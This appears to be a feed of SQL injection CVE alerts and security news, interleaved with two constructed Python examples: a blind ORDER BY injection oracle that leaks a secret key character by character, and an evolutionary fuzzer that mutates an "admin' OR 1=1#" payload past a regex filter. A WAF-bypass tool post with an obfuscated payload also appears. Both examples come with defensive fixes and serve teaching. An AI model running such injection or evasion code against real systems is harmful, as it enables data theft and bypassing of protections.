⚠️ CVE-2026-5019: SQL injection in code-projects Simple Food Order System 1.0 (all-orders.php, Status param). MEDIUM severity, public exploit available — remote attackers at risk. Monitor and restrict exposure. https://radar.offseq.com/threat/cve-2026-5019-sql-injection-in-code-projects-simpl-bb8230db #OffSeq #SQLi #Vuln
⚠️ HIGH severity alert: CVE-2026-2580 – SQL Injection in flippercode WP Maps plugin for WordPress (all versions). Unauthenticated attackers can exfiltrate data via 'orderby'. Patch or mitigate ASAP. https://radar.offseq.com/threat/cve-2026-2580-cwe-89-improper-neutralization-of-sp-b93f1b1b #OffSeq #WordPress #Vuln #SQLi
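The alert above is the classic 'orderby' case: a sort parameter is an SQL identifier, so it cannot be bound as a query parameter and often ends up spliced into the query text, where an attacker turns the row order itself into a boolean oracle. The following added example (my own constructed sqlite3 code, not the WP Maps plugin's source; the table names, the `api_key` column and the payload are all assumptions for illustration) shows a vulnerable sort handler being used to leak a secret one character per query, beside the allow-list fix a practitioner would apply:

```python
import sqlite3
import string

def make_db():
    """Constructed in-memory schema: a public listing plus a table with a secret to exfiltrate."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE places(id INTEGER PRIMARY KEY, name TEXT, rating INTEGER);
        INSERT INTO places VALUES (1, 'zoo', 3), (2, 'museum', 5), (3, 'park', 1);
        CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, api_key TEXT);
        INSERT INTO users VALUES (1, 'admin', 'k3y-0042');
    """)
    return con

def list_places_vulnerable(con, orderby):
    # ORDER BY takes an identifier, so the request value is spliced into the SQL text.
    # Parameter binding cannot express this, which is exactly why it gets done by concatenation.
    sql = f"SELECT id, name FROM places ORDER BY {orderby}"
    return [row[1] for row in con.execute(sql)]

def sort_oracle(con, position, guess):
    """One blind query: True iff `guess` is the character at `position` of the admin api_key.
    A correct guess sorts by rating (museum first); a wrong one sorts by id (park first)."""
    payload = (f"(CASE WHEN (SELECT substr(api_key,{position},1) FROM users WHERE id=1)='{guess}' "
               f"THEN rating ELSE id END) DESC")
    return list_places_vulnerable(con, payload)[0] == "museum"

def leak_api_key(con, length, charset=string.ascii_lowercase + string.digits + "-"):
    """Recover the secret character by character from nothing but the result order."""
    leaked = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if sort_oracle(con, pos, ch):
                leaked += ch
                break
        else:
            leaked += "?"  # character outside the charset; a real attack would widen it
    return leaked

# Hardened variant: map the untrusted sort key to a fixed set of column names and directions.
SORTABLE_COLUMNS = {"id": "id", "name": "name", "rating": "rating"}

def list_places_hardened(con, orderby, direction="ASC"):
    col = SORTABLE_COLUMNS.get(orderby)
    if col is None or direction not in ("ASC", "DESC"):
        raise ValueError("unsupported sort parameter")
    # Only values from our own allow-list ever reach the query text.
    sql = f"SELECT id, name FROM places ORDER BY {col} {direction}"
    return [row[1] for row in con.execute(sql)]

if __name__ == "__main__":
    con = make_db()
    print("leaked via ORDER BY oracle:", leak_api_key(con, 8))
    print("hardened, rating DESC:", list_places_hardened(con, "rating", "DESC"))
```

The point to take from the oracle is that no error message and no data from the `users` table is ever displayed; the leak rides entirely on which public row comes first, so logging only database errors will not show the attack. The fix is an allow-list keyed on the request value, never a denylist of "dangerous" characters in the sort parameter.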
🔴 CVE-2026-27413: CRITICAL Blind SQL Injection in Cozmoslabs Profile Builder Pro (≤3.13.9) allows unauthenticated data exfiltration. No patch yet — restrict access, monitor logs. Details: https://radar.offseq.com/threat/cve-2026-27413-cwe-89-improper-neutralization-of-s-2b17e884 #OffSeq #WordPress #SQLi #Infosec
Kanboard CVE-2026-33058 Writeup

Walkthrough of the discovery of an authenticated SQL injection in Kanboard version <= 1.2.50 tracked as CVE-2026-33058

0dave
🚨 CVE-2026-22730: HIGH-severity SQL injection in VMware Spring AI (1.0.x, 1.1.x) lets users with limited privileges run arbitrary SQL via MariaDBFilterExpressionConverter. Patch ASAP & harden input validation! https://radar.offseq.com/threat/cve-2026-22730-vulnerability-in-vmware-spring-ai-ddcf48d5 #OffSeq #VMware #SQLi #Infosec
SQLi flaw in Elementor Ally plugin impacts 250k+ WordPress sites

An SQL injection vulnerability in Ally, a WordPress plugin from Elementor for web accessibility and usability with more than 400,000 installations, could be exploited to steal sensitive data without authentication.

BleepingComputer
🚨 CRITICAL: CVE-2026-2584 in Ciser CSIP firmware 3.0 – 5.1 enables unauthenticated SQL injection via login interface. Config data at risk — patch not yet released. Restrict access & monitor now. https://radar.offseq.com/threat/cve-2026-2584-cwe-89-improper-neutralization-of-sp-3951e11b #OffSeq #CVE20262584 #SQLi #FirmwareSecurity
CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! https://radar.offseq.com/threat/cve-2026-2247-cwe-89-improper-neutralization-of-sp-b8f5f03e #OffSeq #SQLi #InfoSec #EduSec

New Tool Alert

pirebok - a guided adversarial fuzzer with evolutionary search

Give it a payload. It mutates it until it bypasses the WAF.

No wordlists. No manual tuning. 9 mutation strategies. Evolutionary search breeds payloads until they slip past classifiers.

pirebok -f GuidedRandomSqlFuzzer -p "admin' OR 1=1#"
> aDm1n'/**/oR/**/0x1=1#

pip install pirebok
github.com/HappyHackingSpace/pirebok

#infosec #waf #sqli #fuzzing #pentesting #python #opensource #HappyHackingSpace #Diyarbakir
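To make the "mutate until it slips past the classifier" idea concrete, here is an added, self-contained sketch of the same approach (my own toy code, not pirebok's implementation or its nine strategies; the signature rules, the three mutators and the scoring are all assumptions for illustration). A payload is scored by how many rules of a constructed regex-based filter it triggers, the fittest variants are mutated with semantics-preserving rewrites, and the loop stops at the first variant that triggers nothing while still canonicalizing back to the original:

```python
import random
import re

# Constructed toy filter: three naive signature rules, the kind of blocklist a WAF might ship.
TOY_WAF_RULES = [
    ("or-tautology", re.compile(r"\bor\s+1\s*=\s*1", re.I)),
    ("quote-or", re.compile(r"'\s+or\s", re.I)),
    ("n=n", re.compile(r"\b(\d+)\s*=\s*\1\b")),
]

def waf_hits(payload):
    """Fitness: number of rules the payload triggers (0 means it passes the toy filter)."""
    return sum(1 for _, rule in TOY_WAF_RULES if rule.search(payload))

# Mutators that keep MySQL semantics: keywords are case-insensitive, /**/ is whitespace, 0x1 == 1.
def mut_case(p, rng):
    i = rng.randrange(len(p))
    return p[:i] + p[i].swapcase() + p[i + 1:]

def mut_comment_ws(p, rng):
    spots = [m.start() for m in re.finditer(r" ", p)]
    if not spots:
        return p
    i = rng.choice(spots)
    return p[:i] + "/**/" + p[i + 1:]

def mut_hex_int(p, rng):
    # Only rewrite bare decimal literals, never digits already inside a 0x... literal.
    ms = list(re.finditer(r"(?<![0-9a-fA-Fx])\d+(?![0-9a-fA-Fx])", p))
    if not ms:
        return p
    m = rng.choice(ms)
    return p[:m.start()] + hex(int(m.group())) + p[m.end():]

MUTATORS = [mut_case, mut_comment_ws, mut_hex_int]

def canonical(p):
    """Undo the mutations so we can check the variant still means what the seed meant."""
    p = p.replace("/**/", " ").lower()
    return re.sub(r"0x[0-9a-f]+", lambda m: str(int(m.group(), 16)), p)

def evolve(seed_payload, seed=7, pop_size=20, generations=200):
    """(mu+lambda)-style search: keep the least-detected, shortest variants, breed the rest."""
    rng = random.Random(seed)
    population = [seed_payload]
    best = seed_payload
    for gen in range(generations):
        scored = sorted(population, key=lambda p: (waf_hits(p), len(p)))
        best = scored[0]
        if waf_hits(best) == 0:
            return best, gen
        parents = scored[:max(2, pop_size // 4)]
        children = [rng.choice(MUTATORS)(rng.choice(parents), rng)
                    for _ in range(pop_size - len(parents))]
        population = parents + children
    return best, generations

if __name__ == "__main__":
    seed_payload = "admin' OR 1=1#"
    best, gens = evolve(seed_payload)
    print(f"{seed_payload!r} hits {waf_hits(seed_payload)} rules")
    print(f"after {gens} generations: {best!r} hits {waf_hits(best)} rules")
```

The defensive reading is the interesting one: every mutator here defeats a `\s` or literal-digit assumption in a rule, so a filter that canonicalizes the request the way `canonical()` does (strip comments, fold case, decode numeric literals) before matching removes the fitness gradient the search depends on. Signature rules that match raw bytes are the ones this kind of fuzzer finds gaps in.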

Why

do we still

have SQL injection vulnerabilities?

I mean, come on man.

https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html

#fortinet #sqli

Fortinet Patches Critical SQLi Flaw Enabling Unauthenticated Code Execution

Fortinet fixes critical FortiClientEMS SQL injection flaw (CVSS 9.1) enabling code execution; separate SSO bug actively exploited.

The Hacker News